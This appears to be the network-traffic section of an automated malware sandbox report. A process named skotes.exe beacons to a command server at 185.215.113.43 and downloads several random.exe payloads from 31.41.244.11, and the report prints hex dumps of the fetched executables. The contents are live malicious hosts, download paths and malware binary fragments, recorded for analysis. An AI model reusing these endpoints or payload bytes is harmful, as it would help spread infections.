                                                                                                                                                                                              Data Ascii: @))nX]Bp@Bl@@=@t,rJrA=@t3@-r.r%%r=@u@r@H;@t&H8 t8t@GIt? t?t)1?(u*"H1GIt6?(uB?)uJy"1O"#


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.449794185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:19.224004030 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015819001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:01:20.575397015 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:20 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.44980031.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:20.701812983 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.069653988 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:21 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 4438776
                                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675784f0-43baf8"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070116997 CET224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                              Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070166111 CET1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                                              Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070204973 CET1236INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                                              Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070245981 CET1236INData Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34
                                                                                                                                                                                              Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070290089 CET672INData Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50
                                                                                                                                                                                              Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuW
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070852041 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                                              Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070910931 CET224INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                                              Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$A
                                                                                                                                                                                              Dec 16, 2024 01:01:22.070945024 CET1236INData Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83
                                                                                                                                                                                              Data Ascii: ujWPOG;~|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
                                                                                                                                                                                              Dec 16, 2024 01:01:22.071058989 CET1236INData Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75
                                                                                                                                                                                              Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ
                                                                                                                                                                                              Dec 16, 2024 01:01:22.190412998 CET1236INData Raw: 15 04 a1 41 00 5e c3 33 c0 5e c3 56 e8 ac fe ff ff 59 5e c3 53 8b 5c 24 0c 8b 03 83 63 04 00 66 83 20 00 56 8b 74 24 0c 57 6a 02 5f eb 08 66 3d 20 00 77 0a 03 f7 0f b7 06 66 85 c0 75 f0 66 83 3e 2c 75 0f eb 0b 66 85 c0 74 4d 66 3d 2c 00 74 47 03
                                                                                                                                                                                              Data Ascii: A^3^VY^S\$cf Vt$Wj_f= wfuf>,uftMf=,tGf={u0{t+uFf8}tF"Ff8{uPfu_^[L$Vj\%L$j/;~^VW|$t$A~!FPPPt$


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449825185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:31.673388958 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015821001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:01:33.001277924 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:32 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.44982931.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:33.135123014 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.556935072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:34 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 727552
                                                                                                                                                                                              Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "67594bc0-b1a00"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557024002 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557061911 CET1236INData Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00
                                                                                                                                                                                              Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557295084 CET1236INData Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6
                                                                                                                                                                                              Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557353020 CET1236INData Raw: 45 d4 89 c3 83 e3 fc 83 e0 03 31 ff 83 f8 01 74 1e 83 f8 02 74 0e 83 f8 03 75 23 90 0f be 7c 1a 02 c1 e7 10 90 0f be 44 1a 01 c1 e0 08 31 c7 90 0f be 04 1a 31 f8 69 c0 95 e9 d1 5b 31 c6 8b 45 d8 83 f8 10 72 43 8d 50 01 81 fa 00 10 00 00 72 2a 90
                                                                                                                                                                                              Data Ascii: E1ttu#|D11i[1ErCPr*MA) U$ffff.ERP1i[1TWMAEEAEEuuVHAuVH
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557405949 CET1236INData Raw: ff ff 6a 02 e8 5b 08 00 00 90 c7 45 dc 00 00 00 00 6a 06 e8 4c 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 01 e8 3a 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 05 e8 28 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 02 e8 16 08 00 00 83 c4 04 66
                                                                                                                                                                                              Data Ascii: j[EjLEj:Ej(EjfDUM]fff.UM]fff.Uu]Uu]U}u]e
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557447910 CET1236INData Raw: 83 62 04 00 52 50 e8 23 21 00 00 59 59 8b c6 5e c9 c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 44 60 41 00 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 f7 20 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 44 60 41 00 50 e8 42 21 00 00 59 c3 55
                                                                                                                                                                                              Data Ascii: bRP#!YY^UVFD`A `PEP YY^]AD`APB!YUVuLaA^]aaA A`AUVu`A^]UMhAEPUEM#P+w]Y[AQvRPPQE
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557912111 CET1236INData Raw: d8 e8 1a fe ff ff 8d 45 14 8b ce 50 e8 0e fd ff ff 8d 4d 14 e8 07 fe ff ff 8b c6 e8 a1 07 00 00 c3 55 8b ec 83 ec 20 a1 00 e6 41 00 33 c5 89 45 fc 8b 45 10 56 83 ec 18 8b f1 8b cc 89 75 e0 89 75 e0 50 e8 68 fc ff ff ff 75 0c 8d 45 e4 ff 75 08 50
                                                                                                                                                                                              Data Ascii: EPMU A3EEVuuPhuEuPW$PMMUNMaA3V^tUVuWVaAFVGW_^]UVFD`APEYtjVYY^]j [A
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557948112 CET1236INData Raw: 00 ff 8e 90 01 00 00 8b 86 90 01 00 00 59 59 43 83 c7 14 8b c8 85 c0 75 b5 8b b6 94 01 00 00 85 f6 75 9c 68 4c e6 41 00 e8 e0 02 00 00 59 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 cc cc cc cc cc 56 8b f1 56 e8 b0 02 00 00 59 85 c0 75 11 8b
                                                                                                                                                                                              Data Ascii: YYCuuhLAYMdY_^[VVYuuj^jy,uA,2UQVjjulAt2utEPuAtEuHAjX^%AUMhAEPU
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557984114 CET1236INData Raw: 56 68 8c b8 41 00 ff 15 d4 cc 41 00 8b f0 68 4c a6 41 00 56 ff 15 dc cc 41 00 68 60 a9 41 00 56 a3 1c f5 41 00 ff 15 dc cc 41 00 a3 20 f5 41 00 33 c0 5e c3 55 8b ec 6a ff 68 69 5c 41 00 64 a1 00 00 00 00 50 56 a1 00 e6 41 00 33 c5 50 8d 45 f4 64
                                                                                                                                                                                              Data Ascii: VhAAhLAVAh`AVAA A3^Ujhi\AdPVA3PEd5AutAAMdY^SVD$uL$D$3D$A\$T$D$ud$D$r;T$wr;D$
                                                                                                                                                                                              Dec 16, 2024 01:01:34.677162886 CET1236INData Raw: 5e c3 55 8b ec e8 eb 07 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 28 f5 41 00 87 01 5d c3 55 8b ec 83 7d 08 00 75 07 c6 05 2c f5 41 00 01 e8 94 04 00 00 e8 63 0e 00 00 84 c0 75 04 32 c0 5d c3 e8 d4 17 00 00 84 c0 75 0a 6a 00 e8 6a 0e 00 00 59
                                                                                                                                                                                              Data Ascii: ^Ut}u3(A]U}u,Acu2]ujjY]U=,At}uuuAYY]U=-At]VutubSt&u"h0AAYuh<AAYt+200A4A8A<A@ADA


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              9192.168.2.449846185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:38.485145092 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015822001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:01:39.822947025 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:39 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              10192.168.2.44984831.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:39.969263077 CET61OUTGET /files/martin/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288105965 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:41 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 4482048
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:13:22 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6292-446400"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 ab 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 5c 47 00 00 66 6d 00 00 32 00 00 00 00 c0 00 00 10 00 00 00 70 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 c0 00 00 04 00 00 ab 0b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f d0 6a 00 73 00 00 00 00 c0 6a 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e4 bf 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 e3 bf 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL]g(\Gfm2pG@0E@ _jsj j2(@.rsrcjB(@.idata jD(@ 9jF(@tvjsubtqH(@qahvagxv>D@.taggant0"BD@
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288140059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288158894 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288307905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288326025 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: -%)_t
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288655043 CET1236INData Raw: d4 f6 26 9a 65 b5 60 0f c5 04 32 d5 73 86 36 65 be d4 f1 f3 cd 2e 32 0e 70 f4 0e 52 15 c6 1a fa 31 2d e0 9d 52 8f 9d fc 63 fa d4 62 93 e1 77 67 f8 7d 87 94 cc a2 67 1f f7 33 d7 1b a3 a3 18 68 9c d6 a2 5b 5f fa 0b 29 ea 34 4e c4 8b 84 fd fe 25 fd
                                                                                                                                                                                              Data Ascii: &e`2s6e.2pR1-Rcbwg}g3h[_)4N%0q^zfZ=g*e>#qSu#nfYssVyI>&dB~O|LMn|_y[c|AnPhF%*B$)q/MrAX(|Mu
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288671017 CET1236INData Raw: 36 93 c4 4b ee b8 0a 0f 58 7b 59 c1 6b f8 9a d2 c5 31 c9 8f f2 e5 10 9a dd b6 98 13 52 31 c0 9c 73 5d 27 b1 1e da cf c3 f4 89 fc 60 51 3a dc ea 79 cc b8 0f f8 35 10 eb 4b d3 62 ca bd 0e 89 0f c7 20 28 45 f9 5a a8 49 9c 0a 88 bd 56 77 09 1a 44 16
                                                                                                                                                                                              Data Ascii: 6KX{Yk1R1s]'`Q:y5Kb (EZIVwDt0%X<W'l+.m%V`;zf%Fh|^8z-4?qShB=9N'LDme+:C*brnYVQ>~S5K`ffBJ3K
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288687944 CET896INData Raw: e5 ee a3 27 dd fa 8a 49 6f 57 43 fd da 10 5e b0 63 b6 ca 34 41 0c 88 fe e7 7c 42 e7 0c 02 2d ce 8d fb 89 dc a6 4c 1a e5 c2 01 c3 24 18 53 1a 21 fa 8c 62 35 bb 95 a3 b8 a5 93 1f 68 4d 09 06 e7 17 56 55 82 10 18 1e 13 a8 b3 4f 96 e3 e1 1e b2 d8 00
                                                                                                                                                                                              Data Ascii: 'IoWC^c4A|B-L$S!b5hMVUOc,Kn^IX<j`rxvntlI"96.C0nvD'5;*"{jPnkX@dXR4$~0'
